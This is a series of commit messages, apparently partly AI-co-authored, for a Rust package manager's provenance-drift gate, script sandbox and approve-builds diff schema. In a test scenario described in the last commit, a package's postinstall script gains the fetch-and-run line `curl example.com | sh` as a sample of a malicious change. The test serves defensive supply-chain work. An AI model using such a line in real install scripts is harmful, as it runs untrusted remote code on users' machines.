Non-empty list OR `ignore_provenance_drift_all = true` on the `-g` path fails with:
> `--ignore-provenance-drift` / `--ignore-provenance-drift-all`
> are not supported on `lpm install -g` in Phase 46 P4 (global
> trust store is tracked for Phase 46.1). Drop the flag for
> global installs.
D13/D19 rationale: the global trust store is a separate schema
(`lpm-global/src/trusted_deps.rs`, §3.9 in the plan) that doesn't
carry `provenance_at_approval`, so the override flags have no
semantic target on the `-g` path. Reject explicitly rather than
silently drop — same safety argument the P3 reviewer made for the
cooldown flag.
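The rejection rule reduces to a small predicate. The sketch below isolates just the two new parameters in a hypothetical helper, `reject_drift_flags_on_global`; the real `validate_global_install_project_scoped_flags` takes more arguments and its return type is not shown in this commit, so `Result<(), String>` is an assumption.

```rust
/// Hypothetical helper isolating the two new checks on the `-g` path.
fn reject_drift_flags_on_global(
    ignore_provenance_drift: &[String],
    ignore_provenance_drift_all: bool,
) -> Result<(), String> {
    // Reject explicitly rather than silently dropping the flags.
    if !ignore_provenance_drift.is_empty() || ignore_provenance_drift_all {
        return Err(concat!(
            "`--ignore-provenance-drift` / `--ignore-provenance-drift-all` ",
            "are not supported on `lpm install -g` in Phase 46 P4 (global ",
            "trust store is tracked for Phase 46.1). Drop the flag for ",
            "global installs."
        )
        .to_string());
    }
    Ok(())
}
```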
Two new rejection regression tests:
* `install_global_rejects_ignore_provenance_drift_flag` — covers
the repeatable per-package variant (tests with two `<pkg>`
arguments).
* `install_global_rejects_ignore_provenance_drift_all_flag` —
covers the blanket variant.
Existing `install_global_rejects_project_scoped_yes_flag` +
`install_global_rejects_min_release_age_flag` tests updated to
pass the two new validator args (empty list + false).
## Behavioural verification
* `lpm-rs install --help` — both flags documented with full rationale.
* `lpm-rs install -g eslint --ignore-provenance-drift axios` → exit
1, error names the flag + Phase 46.1.
* `lpm-rs install -g eslint --ignore-provenance-drift-all` → exit
1, same rejection shape.
## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)
* `cargo clippy --workspace -- -D warnings` — clean (with two
`#[allow]` pragmas explained below).
* `cargo fmt --check` — clean.
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches.
* `cargo build --workspace` — clean.
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — **4002/4002 pass**, zero flakes.
## Lint pragmas added
* `#[allow(clippy::too_many_arguments)]` on
`validate_global_install_project_scoped_flags` — 8 args is above
the clippy threshold but every argument is a distinct flag
surface that belongs on the validator; packaging them into a
struct would add ceremony without improving callsite clarity
(the two test callers already pass them individually for test
documentation).
* `DriftIgnorePolicy` derives `Default` via `#[default]` on the
`EnforceAll` variant (was a manual impl; clippy's
`derivable_impls` caught it).
Chunk 5 follows with the wiremock E2E suite covering the §11 P4
ship criteria + these override flags end-to-end.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
End-to-end coverage for the Phase 46 P4 drift gate + override
flags, exercising the full `lpm install` pipeline against a
wiremock-backed registry that serves BOTH the package metadata
(with `dist.attestations.url`) AND the attestation bundle itself.
Harness pattern mirrors `release_age_p3_ship_criteria.rs` with two
new pieces: (a) the bundle endpoint serves a synthetic Sigstore
bundle whose leaf cert carries a deterministic GitHub Actions OIDC
SAN URI (generated via rcgen per test), (b) the project manifest's
`trustedDependencies` map carries a populated
`provenanceAtApproval` so the drift gate has a reference to
compare against.
## §11 P4 ship criteria covered
1. **`attestation_deleted_between_approved_and_candidate_blocks`** —
the axios 1.14.1 scenario end-to-end. Approved v1.0.0 has
provenance; registry serves v1.0.1 with NO `dist.attestations`.
Install blocks with "provenance dropped" verdict.
2. **`ignore_provenance_drift_per_package_unblocks`** — same
fixture plus `--ignore-provenance-drift @lpm.dev/acme.widget`.
Drift block suppressed AND the waiver-advisory line appears
(the opt-out is audit-visible, not silent).
3. **`ignore_provenance_drift_all_unblocks`** — blanket waiver
fires at the zero-cost short-circuit; the
"waived for this install by --ignore-provenance-drift-all"
advisory appears before the per-package loop would have.
4. **`identity_changed_between_approved_and_candidate_blocks`** —
both versions carry attestations but the publisher differs
("repo moved to attacker fork" scenario). Verdict:
"publisher identity changed".
## Reviewer-flagged regression guards
5. **`legitimate_release_bump_does_not_drift`** — Finding-1 E2E
guard. v1.0.0 → v1.0.1 from the same publisher + same workflow
file necessarily differs on `workflow_ref` AND
`attestation_cert_sha256` (Fulcio's per-signing leaf). Identity-
tuple equality excludes both; install proceeds. If this test
ever regresses, every legitimate patch bump would hard-block —
catastrophic for gate usability. Guards eec6312's comparator
fix.
6. **`allow_new_alone_does_not_bypass_drift`** — D16 orthogonality
guard. Approved-present + candidate-absent scenario with just
`--allow-new` passed. P3 cooldown override MUST NOT bypass P4
drift: the two gates are orthogonal and their overrides are
scoped independently. Regression here would silently merge the
two gates and break the reviewer-surfaced "cooldown and
provenance are orthogonal signals" contract.
## Reliability guard
7. **`degraded_fetch_does_not_falsely_block`** — attestation URL
returns HTTP 500. Fetcher degrades to `Ok(None)` per the P4
offline-mode contract; comparator returns `NoDrift`; install
proceeds. A Sigstore rate-limit or transient network error
must NEVER produce a spurious drift block — this test guards
the `(Some(_), None) → NoDrift` branch in
`check_provenance_drift`.
## Zero-cost short-circuit guard
8. **`project_with_no_approvals_skips_drift_gate`** — a project
without any rich `trustedDependencies` entries must skip the
gate entirely: no `LpmRoot::from_env()` call, no
`reqwest::Client` construction, no per-package iteration. The
`-all` waive advisory must NOT fire (user didn't pass it).
Guards the Chunk 3 `has_rich_approvals` optimization.
## Harness structure
Shared fixtures (~250 LOC) + 8 focused tests (~150 LOC). Two
parameterized enums (`AttestationShape` / `AttestationResponse`)
drive the registry's response shape, so each test describes its
scenario in 3-4 lines. rcgen generates an ephemeral cert per
test — the SHA rotates as it would in production, proving the
comparator doesn't accidentally depend on cert-SHA equality.
## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — **4010/4010 pass**, zero flakes. New E2E
suite: 8/8 pass in 1.74s total (each test ~1.7s for
subprocess + mock-server spinup).
## P4 status after this chunk
The P4 client-side work is feature-complete. Remaining for
ship-complete: the separate server-side registry PR that adds
`dist.signatures` + `dist.attestations` to the LPM registry's
package-metadata response (§11 P4 parallel track, out of this
branch's scope). Until that lands, LPM-registry packages will
degrade to "unknown attestation" per the Ok(None) contract — the
drift gate is still active for npm-hosted packages that already
serve `dist.attestations`.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rt-circuit naming
Two reviewer-flagged harness-strength defects in 30ae5f9, both
addressed with stronger assertions or more modest claims — not
production-code changes.
## Finding 1 — unblocked tests overclaimed "install proceeds"
The shared `assert_drift_not_blocked` helper only checked for absence
of the drift-block message. Five tests
(`ignore_provenance_drift_per_package_unblocks`,
`ignore_provenance_drift_all_unblocks`,
`legitimate_release_bump_does_not_drift`,
`degraded_fetch_does_not_falsely_block`, and the renamed no-approvals
test) claimed "install proceeds" / "install unblocks" but would pass
equally well if the subprocess exited non-zero for some unrelated
reason (e.g., a regression in a downstream pipeline stage that leaves
the drift message absent).
Fix: new helper `assert_drift_not_blocked_and_install_succeeded` that
composes three checks:
1. The drift-block message is absent (unchanged).
2. `status.success()` — exit 0 proves the subprocess didn't fail for
any reason.
3. A post-link completion marker appears in the output (`"linked"` on
the human path OR `"success":true` on the JSON path). Proves the
pipeline actually reached stages AFTER the drift gate fires — the
gate fires BEFORE fetch/link, so a completion marker is
upstream-reliable evidence of forward progress, not merely "the drift
branch didn't emit its block message."
All five unblocked tests switched to the stronger helper. All 8 still
pass (1.7 s each; 8 tests in 1.8 s total wall time).
## Finding 2 — "skips drift gate" test didn't actually verify the skip
`project_with_no_approvals_skips_drift_gate` claimed to guard the
Chunk 3 `has_rich_approvals` short-circuit optimization in
`install.rs`. But that optimization is a pure internal performance
fast-path: the alternative (gate enters, iterates packages, each
returns `None` from `provenance_reference_for_name`, no fetch fires)
produces the exact same external behavior.
A runtime subprocess test cannot distinguish "fast path taken" from
"slow path with no matches" without instrumentation (e.g., a
`tracing` debug marker + log-capturing harness).
Fix: rename the test to
`project_with_no_approvals_does_not_block_on_drift` — what the
assertions ACTUALLY prove. Updated the docstring to explain the
previous overclaim, note that verifying the specific optimization is
deferred to a future tracing-based harness, and document the
observable contract this test now guards (no block + no
blanket-waive advisory + install completes end-to-end). The test body
itself now also uses the stronger
`assert_drift_not_blocked_and_install_succeeded` helper, so it
catches the Finding-1-class regression simultaneously.
## Top-of-file coverage comment updated
The module docstring's test list was missing item 8 (the
no-approvals case) and didn't describe the new "strong unblocked
assertion" shape. Both added so the file reads coherently.
## CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`)
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — **4010/4010 pass**, zero flakes.
* Focused suite: `cargo nextest run -p lpm-cli --test
provenance_drift_p4_ship_criteria` — 8/8 pass under the tighter
assertions.
Production code from Chunks 1-4 is unchanged. The blocker was
strictly in the ship-criteria test harness layer.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
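The three composed checks from Finding 1 of this commit can be sketched as a pure function. This is an illustration only: `RunOutput` is a hypothetical capture type, the function returns `Result` instead of panicking so it is easy to exercise, and the drift-block marker is passed in because the exact message text is not quoted in the commit. The two completion markers are the ones the commit names.

```rust
/// Hypothetical capture of a finished `lpm install` subprocess.
struct RunOutput {
    success: bool,    // what `status.success()` returned
    combined: String, // stdout and stderr concatenated
}

/// Passes only if the drift gate did not block AND the install finished.
fn check_drift_not_blocked_and_install_succeeded(
    out: &RunOutput,
    drift_block_marker: &str,
) -> Result<(), String> {
    // 1. The drift-block message must be absent.
    if out.combined.contains(drift_block_marker) {
        return Err("drift gate blocked the install".to_string());
    }
    // 2. Exit 0 rules out failure for any unrelated reason.
    if !out.success {
        return Err("subprocess exited non-zero".to_string());
    }
    // 3. A completion marker proves stages after the gate actually ran.
    let completed =
        out.combined.contains("linked") || out.combined.contains("\"success\":true");
    if !completed {
        return Err("no post-link completion marker in output".to_string());
    }
    Ok(())
}
```

The second and third checks are what separate "not blocked by drift" from "install proceeded"; the first check alone passes for any unrelated failure.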
Introduces crates/lpm-sandbox with the public API that Chunks 2-6
build on without touching the call site in build.rs. No wiring yet:
scripts still run exactly as they do on main, since nothing
constructs a Sandbox outside the crate's own tests.
Scaffolds:
- SandboxSpec: package + project + host path set the platform backend
needs to synthesize its profile, plus extra_write_dirs for the
package.json > lpm > scripts > sandboxWriteDirs escape hatch (§9.6).
All paths must be absolute; validate_spec enforces before
construction.
- SandboxMode: Enforce (default), LogOnly (diagnostic, explicitly
non-authoritative per Chunk 4 signoff), Disabled (--unsafe-full-env
--no-sandbox). Disabled always works — the escape hatch is reachable
from every platform including Windows.
- SandboxedCommand + SandboxStdio: platform-neutral process
description so backends own the OS-level Command (macOS rewrites the
program to sandbox-exec; Linux installs pre_exec). Callers never
touch std::process::Command directly.
- Sandbox trait: spawn() + backend_name() + mode(). Object-safe, so
callers hold Box<dyn Sandbox>.
- SandboxError: structured variants (UnsupportedPlatform,
KernelTooOld, ProfileRenderFailed, SpawnFailed, InvalidSpec) each
carry a user-facing remediation field — §12.5's escape-corpus tests
in Chunk 5 assert against these.
- unsupported_remediation(): single source of truth for the "sandbox
unavailable on windows — Phase 46.1 …" string Chunk 4 surfaces at the
CLI layer, so the doc reference and CLI surface stay in sync.
- NoopSandbox: real functional backend for SandboxMode::Disabled.
Runs the command with no containment, on every platform. This is the
only non-stub impl in Chunk 1.
- macos.rs + linux.rs: cfg-gated backend stubs per CLAUDE.md
cross-platform hygiene rule. Both construct successfully so the
factory contract is stable across chunks; spawn() returns
ProfileRenderFailed naming the Chunk that wires the real impl.
Avoids silent no-op containment on platforms that should have it.
- Factory dispatch via platform_backend(): each arm is a fully
cfg-gated free function, so unsupported platforms don't compile dead
code from supported arms (CLAUDE.md ungated-platform-code rule).
Chunk 1 ship criteria:
- Crate compiles workspace-wide clippy-clean on macOS (host) and
Linux (CI will confirm). ✓ cargo clippy --workspace -- -D warnings
clean.
- Unit tests cover SandboxSpec construction, SandboxMode properties,
SandboxedCommand builder, every SandboxError variant's Display
(including token-level assertions the Chunk 5 corpus will reuse),
validate_spec's invariants, factory dispatch per mode + per platform,
and NoopSandbox end-to-end with a trivial command. 22/22 pass.
- No wiring into execute_script — build.rs unchanged. ✓
Gate status (CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target):
- cargo clippy --workspace -- -D warnings: clean
- cargo fmt --check: clean
- grep -r fancy-regex crates/*/Cargo.toml: absent
- cargo build --workspace: clean
- cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast: 4031 passed, 1 flake in
lpm-task::perf_eval_glob_200_members_under_500us_per_call (passes
isolated in 0.134s — pre-existing brittleness of the 500µs perf
assertion under heavy parallel load; not introduced by this change).
- cargo test -p lpm-auth x3: 47/47 deterministic under parallel test
runner.
Branch: phase-46-p5, cut from phase-46 at 7153e59 per signoff (P4
stays unmerged from main; P5 builds on phase-46).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Replaces build.rs's direct `Command::new("sh")` spawn on macOS with a
sandbox-exec-wrapped spawn routed through lpm_sandbox. Ship criteria
#1 (deny reads + writes outside allow list) and #2 (benign postinstall
succeeds) covered by unit tests that actually shell out to
sandbox-exec on the host. Linux stays on the Chunk 1 stub + cfg-forked
legacy path in build.rs until Chunk 3 lands landlock; non-macOS
platforms observe zero behavior change from this chunk.
SandboxMode is computed at the build call site (not encoded in
ScriptPolicyConfig) per the Chunk 2 signoff:
- default → SandboxMode::Enforce
- `--unsafe-full-env --no-sandbox` → SandboxMode::Disabled (escape
hatch; emits a loud warning banner at the call site)
- `--sandbox-log` → SandboxMode::LogOnly (strictly diagnostic —
banner explicitly tells the user a clean run is NOT a safety
signal; Chunk 4 lands the real non-enforcing backend)
`--no-sandbox` requires `--unsafe-full-env` (clap-level `requires`
attribute; using `--no-sandbox` alone errors out). `--no-sandbox`
and `--sandbox-log` are mutually exclusive (clap `conflicts_with`).
Auto-build inside `lpm install` hardcodes both to `false` — autoBuild
never bypasses containment (D20).
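The flag-to-mode mapping above can be sketched as a plain function. In the commit the `requires` and `conflicts_with` constraints are enforced by clap before this point; the hypothetical `resolve_sandbox_mode` below models them inline only so the whole rule set is visible in one place. The enum variants are the ones the commit names; the error strings are illustrative.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
enum SandboxMode {
    #[default]
    Enforce,
    LogOnly,
    Disabled,
}

/// Hypothetical resolver; the real constraints live in clap attributes.
fn resolve_sandbox_mode(
    unsafe_full_env: bool,
    no_sandbox: bool,
    sandbox_log: bool,
) -> Result<SandboxMode, String> {
    match (no_sandbox, sandbox_log) {
        // Models clap `conflicts_with`.
        (true, true) => {
            Err("--no-sandbox and --sandbox-log are mutually exclusive".to_string())
        }
        // Models clap `requires`.
        (true, false) if !unsafe_full_env => {
            Err("--no-sandbox requires --unsafe-full-env".to_string())
        }
        (true, false) => Ok(SandboxMode::Disabled),
        (false, true) => Ok(SandboxMode::LogOnly),
        (false, false) => Ok(SandboxMode::Enforce),
    }
}
```

Under this model the auto-build path inside `lpm install` corresponds to calling the resolver with `no_sandbox` and `sandbox_log` both `false`, which always yields `Enforce`.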
Sandbox crate additions:
- seatbelt.rs: renders the §9.3 Seatbelt profile per-package with
`{package_dir}/{project_dir}/{home}/{tmpdir}` interpolation.
Writable set stays narrow (§9.3 verbatim: package dir + node_modules
+ .husky + .lpm + ~/.cache + ~/.node-gyp + ~/.npm + /tmp + $TMPDIR
+ sandboxWriteDirs extras). Read set widens past the schematic §9.3
layout with the system primitives real macOS binaries need to load:
stat-the-root literal `/`, /bin + /sbin for coreutils, /System (not
just /System/Library) for dyld shared cache, /private/etc for
libc / resolver, /private/var/db/dyld for the shared cache, /dev
(read-only) for /dev/fd + stdin + stdout + stderr + tty + urandom.
Process primitives: `(allow process*)`, `(allow signal)`,
`(allow mach-lookup)`, `(allow sysctl-read)`, `(allow iokit-open)`
— all confirmed empirically necessary (deny-default blocks even
/usr/bin/true without them on recent macOS releases). Network stays
on per D3.
- config.rs: `load_sandbox_write_dirs` — the one place that reads
package.json > lpm > scripts > sandboxWriteDirs. Relative paths
resolve against project_dir; empty strings rejected (would widen
writes to whole project); non-array / non-string entries surface
as SandboxError::InvalidSpec with an actionable path to fix.
- macos.rs: SeatbeltSandbox replaces the Chunk 1 stub. `new()` renders
the profile up front (so render errors surface at construction,
not mid-spawn). `spawn()` prepends `sandbox-exec -p <profile>` to
the program+args, applies envs/cwd/stdio from the SandboxedCommand,
and sets process_group(0) on unix for kill-tree-on-timeout parity
with the pre-Phase-46 path. NoopSandbox now also sets
process_group(0) on unix so `--no-sandbox` is observably identical
to the legacy direct-spawn.
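The `sandboxWriteDirs` rules described for config.rs (relative paths resolve against project_dir, empty strings are rejected) can be sketched as below. This is an assumption-laden illustration: `resolve_write_dirs` and `WriteDirError` are hypothetical names, the input is already-extracted strings rather than parsed package.json, and passing absolute entries through unchanged is a guess the commit message does not confirm.

```rust
use std::path::{Path, PathBuf};

/// Hypothetical error type; the real crate reports SandboxError::InvalidSpec.
#[derive(Debug, PartialEq, Eq)]
pub enum WriteDirError {
    /// An empty entry would resolve to the project root itself and
    /// widen writes to the whole project.
    EmptyEntry { index: usize },
}

/// Resolve each configured entry against `project_dir`.
pub fn resolve_write_dirs(
    project_dir: &Path,
    entries: &[&str],
) -> Result<Vec<PathBuf>, WriteDirError> {
    let mut resolved = Vec::with_capacity(entries.len());
    for (index, entry) in entries.iter().enumerate() {
        if entry.is_empty() {
            return Err(WriteDirError::EmptyEntry { index });
        }
        // `Path::join` replaces the base when the argument is absolute,
        // so absolute entries pass through unchanged (assumed behavior).
        resolved.push(project_dir.join(entry));
    }
    Ok(resolved)
}
```

Rejecting the empty string before joining matters because `project_dir.join("")` is the project directory itself.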
build.rs integration:
- `run` grows `no_sandbox` + `sandbox_log` params.
- Before the script loop: compute SandboxMode, emit the appropriate
warning banner, load `extra_write_dirs` once, derive `store_root`
from LpmRoot, derive `home_dir` from `dirs::home_dir()`, derive
`tmpdir` from `$TMPDIR` or `/tmp`.
- `execute_script` grows pkg_name/pkg_version/sandbox_mode/
extra_write_dirs/store_root/home_dir/tmpdir params. Env-building
(INIT_CWD + augmented PATH) is platform-neutral and happens once
per call. The spawn step is the ONE cfg-fork point:
`spawn_lifecycle_child` on macOS routes through
`lpm_sandbox::new_for_platform`; on non-macOS it runs the legacy
direct-Command path. Chunk 3 deletes the non-macOS arm.
Adjacent fix: two pre-existing `assert_eq!(x, false)` lints in
build_state.rs that `clippy --all-targets` surfaces on this base.
They slipped through because `--all-targets` isn't on the current CI
invocation; flagged in gate summary so the crew is aware the guard is
partial.
Gate status (macOS host, CARGO_TARGET_DIR=/tmp/lpm-rs-phase46-p5-target):
- cargo clippy --workspace -- -D warnings: clean
- cargo clippy --workspace --all-targets -- -D warnings: clean (after
fixing the two pre-existing build_state.rs asserts)
- cargo fmt --check: clean
- grep -r fancy-regex crates/*/Cargo.toml: absent
- cargo build --workspace: clean
- cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast: 4061 passed, 1 flake (same lpm-task::perf_eval
under-load flake as Chunk 1 — passes isolated in 0.159s, pre-existing
500µs perf-assertion brittleness)
- cargo test -p lpm-auth x3: 47/47 deterministic
- lpm-sandbox crate: 52/52 (13 new seatbelt profile tests, 10 new
config tests, 4 new macos integration tests that shell out to
sandbox-exec for real containment probes, plus the 22 lib tests
inherited from Chunk 1 with the Linux-stub assertion updated)
Ship criteria for Chunk 2:
- ✓ §11 P5 criterion #1: a forbidden-read and a forbidden-write both
fail on macOS (macos::tests::enforces_deny_default_for_forbidden_read
+ denies_write_outside_allow_list_under_enforce).
- ✓ §11 P5 criterion #2: a benign write into the package's own store
dir succeeds on macOS (macos::tests::
allows_write_into_package_dir_under_enforce +
spawns_a_trivial_benign_command_inside_its_own_package_dir).
- ✓ Linux path unchanged from pre-Phase-46 (cfg-forked legacy
Command::new path; Linux stub still returns ProfileRenderFailed
from Sandbox::spawn — guarded by linux_backend_is_still_stub_in_chunk2).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…rsion_diff)
C4 surfaces the version-diff data on the machine channel so agents
driving `lpm approve-builds` and `lpm install --json` can route by
drift dimension without re-classifying. Bumps `SCHEMA_VERSION 2 → 3`
and consolidates the per-blocked-entry JSON shape onto a single
shared helper so the install pipeline and the approve-builds command
cannot drift on the wire.
## Wire shape — version_diff (per blocked entry)
Stable contract: every `version_diff` object emits the SAME keys with
`null` for dimensions that didn't drift, so agents read with uniform
key access.
```json
"version_diff": {
"prior_version": "1.14.0",
"candidate_version": "1.14.1",
"reason": "provenance-drift", // kebab-case wire form
"script_hash_drift": false, // always bool
"behavioral_tags_added": null, // [...] when drifted, null otherwise
"behavioral_tags_removed": null,
"provenance_drift_kind": "dropped" // "identity-changed" | "dropped" | "gained" | null
}
```
`version_diff` itself is `null` when no prior approved binding exists
for the package name (first-time review). When a prior exists, the
object emits even for `reason: "no-change"` so agents can
distinguish "we found the prior at v1.14.0 and it matches" from "no
prior to compare." Same semantic as the C3 TUI: the diff is a
positive equality assertion, not the absence of comparison.
Reason wire forms (kebab-case to match `static_tier`'s convention):
- `no-change` — every dimension we can compare matches.
- `script-hash-drift` — only the script hash drifted.
- `behavioral-tag-shift` — only the behavioral-tag set drifted.
- `provenance-drift` — only the provenance identity tuple drifted.
- `multi-field-drift` — two or more dimensions drifted simultaneously.
`behavioral_tags_added: []` (vs. `null`) is semantically meaningful:
empty array means "tag dimension drifted, with only LOST changes";
null means "tag dimension didn't drift in this case." Both
preserved across the BehavioralTagShift and MultiFieldDrift variants.
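As a rough sketch of the reason selection and the `null` vs `[]` distinction described above: the `Drift` struct and both function names are hypothetical, and the kebab-case strings follow the forms the JSON tests assert later in this PR. The real code works on richer variants (BehavioralTagShift, MultiFieldDrift) than three booleans.

```rust
/// Hypothetical summary of which dimensions drifted between the prior
/// approved binding and the candidate.
#[derive(Debug, Clone, Copy, Default)]
pub struct Drift {
    pub script_hash: bool,
    pub behavioral_tags: bool,
    pub provenance: bool,
}

/// Pick the kebab-case `reason` string for a drift summary.
pub fn reason_wire(drift: Drift) -> &'static str {
    let count = [drift.script_hash, drift.behavioral_tags, drift.provenance]
        .iter()
        .filter(|d| **d)
        .count();
    match (count, drift) {
        (0, _) => "no-change",
        (1, Drift { script_hash: true, .. }) => "script-hash-drift",
        (1, Drift { behavioral_tags: true, .. }) => "behavioral-tag-shift",
        (1, _) => "provenance-drift",
        _ => "multi-field-drift",
    }
}

/// `None` stands for JSON `null` (tag dimension did not drift);
/// `Some(vec![])` stands for `[]` (it drifted, but not in this direction).
pub fn tags_field(tags_drifted: bool, names: &[&str]) -> Option<Vec<String>> {
    tags_drifted.then(|| names.iter().map(|n| n.to_string()).collect())
}
```

Keeping `None` and `Some(vec![])` distinct in the in-memory type is what lets a serializer emit `null` and `[]` as different wire values.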
## Consolidated entry helper
Pre-Chunk-4: per-entry shape was an inline `serde_json::json!{...}`
literal in three places (approve_builds.rs `blocked_to_json`, two
sites in install.rs). Chunk 4 moves the canonical shape into a
single `version_diff::blocked_to_json(blocked, &trusted)` and
delegates from each call site:
- approve_builds.rs's existing private `blocked_to_json` becomes a
thin wrapper that calls the shared helper. All four call sites
(`print_listing`, `print_summary` × 4 paths) thread `&trusted`.
- Both install.rs sites (`run_with_options` + the lockfile fast-path)
call the shared helper directly. They read `&trusted` from the
manifest via the C2 `read_trusted_deps_from_manifest` helper —
graceful degradation: when the manifest is missing/malformed,
`unwrap_or_default()` produces an empty Legacy variant and every
entry's `version_diff` is `null` (which is what an empty
`trustedDependencies` should produce anyway).
Future schema additions to the per-entry shape (P8's `approved_by`
on the binding will surface here) edit ONE site instead of three.
## print_summary signature change
`fn print_summary(... &trusted, ...)` — adds a `&TrustedDependencies`
parameter so the per-entry helper can compute version_diff for the
approved/skipped lists in --yes/interactive output. Note: this fires
post-`write_back`, so `trusted` includes the freshly-added binding
for `name@candidate_version`. The `latest_binding_for_name` selector
is strictly-less-than the candidate, so it skips the freshly-added
entry and reports the diff against the prior version — matches what
the user saw when reviewing. Documented at the call site.
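The strictly-less-than selection can be illustrated with a small stand-in. Everything here is an assumption for the sake of the example: versions are modeled as `(major, minor, patch)` tuples rather than real semver values, and `latest_prior` is a hypothetical name, not the signature of `latest_binding_for_name`.

```rust
/// Simplified version triple; real bindings presumably carry semver values.
pub type Version = (u64, u64, u64);

/// Return the highest bound version of `name` that is strictly below
/// `candidate`, or `None` when no such binding exists.
pub fn latest_prior(
    bindings: &[(&str, Version)],
    name: &str,
    candidate: Version,
) -> Option<Version> {
    bindings
        .iter()
        .filter(|(n, v)| *n == name && *v < candidate)
        .map(|(_, v)| *v)
        .max()
}
```

Because the comparison is strict, a binding written for the candidate itself during `write_back` is never selected, so the summary diffs against the same prior version the reviewer saw.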
## SCHEMA_VERSION bump 2 → 3
The `SCHEMA_VERSION` constant in approve_builds.rs documents the
v3 addition + the bump rule. New `schema_version_bumped_for_version_diff`
const-assert pins the bump so a future revert can't silently
downgrade the version. Pre-v3 readers ignore the new field; v3+
readers branch on `schema_version >= 3` to know when to expect it.
The two existing CLI subprocess tests in
`approve_builds_audit_regression.rs` that assert `schema_version ==
Some(2)` are updated to `Some(3)` with a comment naming both bumps
(P2 Chunk 3 → 2, P7 Chunk 4 → 3) so future readers know the
history.
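A compile-time pin of this kind can be written with a `const` assertion. The sketch below is an assumption about the shape, not the contents of approve_builds.rs; `expects_version_diff` is a hypothetical reader-side helper.

```rust
/// Wire schema version for the JSON envelopes (value taken from the text).
pub const SCHEMA_VERSION: u32 = 3;

// Evaluated at compile time: reverting the constant below 3 fails the build
// instead of silently downgrading the wire contract.
const _: () = assert!(
    SCHEMA_VERSION >= 3,
    "SCHEMA_VERSION must stay >= 3 once version_diff is on the wire"
);

/// Reader-side branch: only v3+ envelopes are expected to carry `version_diff`.
pub fn expects_version_diff(schema_version: u32) -> bool {
    schema_version >= 3
}
```

A reader that treats a missing `version_diff` as "not emitted" for `schema_version < 3` and as a contract violation otherwise stays compatible in both directions.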
## Tests
15 new unit tests in `version_diff::tests`:
- Wire-form pinning: `version_diff_reason_wire_strings_are_kebab_case`,
`provenance_drift_kind_wire_strings_are_kebab_case` — agents grep
on these strings, so changing them is a wire break.
- Per-variant JSON shape: `version_diff_to_json_no_change_*`,
`_script_hash_drift_alone`, `_behavioral_tag_shift_emits_arrays`,
`_behavioral_tag_shift_only_gained_still_emits_empty_lost`,
`_provenance_dropped`, `_provenance_identity_changed`,
`_provenance_gained`, `_multi_field_emits_each_dimension`,
`_multi_field_with_only_some_dimensions_nulls_others`.
- `blocked_to_json` integration: emits `null` when no prior binding;
emits `no-change` object when prior matches; emits full diff when
prior drifts.
Plus `schema_version_bumped_for_version_diff` const-assert.
## Local gate (touched crates)
```
cargo clippy -p lpm-workspace -p lpm-cli --all-targets -- -D warnings
# clean
cargo fmt --check
# clean
cargo test -p lpm-workspace -p lpm-cli
# 88 + 1573 + 78 = 1739 passed; 0 failed
cargo test -p lpm-security -p lpm-global -p lpm-resolver
# 657 passed; 0 failed (binding consumers unaffected)
```
End-to-end JSON shape proof under a real subprocess comes in C5's
reference fixture.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…both ship criteria
C5 lands the §11 P7 ship-criteria gate at the CLI level: end-to-end
subprocess proofs that both ship criteria fire under real fd
separation, real LpmRoot resolution, and the real
store/manifest/build-state read pipeline. Mirrors the P6 Chunk 5
reference-fixture pattern so future readers have one mental model
for "Phase 46 P-N reference fixture."
## Why approve-builds path (not install)
The C2 install render path can't be exercised end-to-end without a
real `lpm install` run (lockfile-validated integrity against a real
registry — same blocker the P6 fixture commentary documents). The
diff-rendering CONTRACT is identical between the install
pre-autobuild card and the approve-builds TUI card (both call
`render_preflight_card`); the C5 fixture exercises the contract
through `lpm approve-builds --list` (human + JSON). A passing
assertion on the approve-builds output proves the install path's
rendering at the exact byte level.
Pure-decision proofs of both ship criteria already exist:
- `version_diff::tests::preflight_card_*` (C2) — pure renderer.
- `commands::install::tests::p7_post_install_hints_*` (C2) —
install enrichment decision.
C5 is the missing end-to-end subprocess proof: real binary, real
fd separation, real LpmRoot.
## Tests (6 added)
**Ship criterion 1 — script_hash drift surfaces the exact added line:**
- `p7_chunk5_script_hash_drift_surfaces_added_curl_pipe_in_approve_builds_list`
Seeds shapeshift@1.0.0 (`echo hi`) + shapeshift@2.0.0
(`echo hi\ncurl example.com | sh`). Approves v1's script_hash in
trustedDependencies. Synthesizes build-state.json with v2 blocked
+ a different script_hash. Runs `lpm approve-builds --list` as a
subprocess, asserts the diff card header (`shapeshift@2.0.0 —
changes since v1.0.0:`) AND the literal `+curl example.com | sh`
line surface in stdout. The literal-line assertion IS the ship
criterion: the user sees the malicious line verbatim, not just
"scripts changed."
- `p7_chunk5_script_hash_drift_emits_structured_version_diff_in_json`
Same scenario, runs `--json`, asserts:
- `schema_version: 3` (P7 Chunk 4 bump).
- `version_diff.reason: "script-hash-drift"`.
- `prior_version: "1.0.0"`, `candidate_version: "2.0.0"`.
- `script_hash_drift: true`, other dimension fields null.
**Ship criterion 2 — behavioral_tag delta surfaces gained tags:**
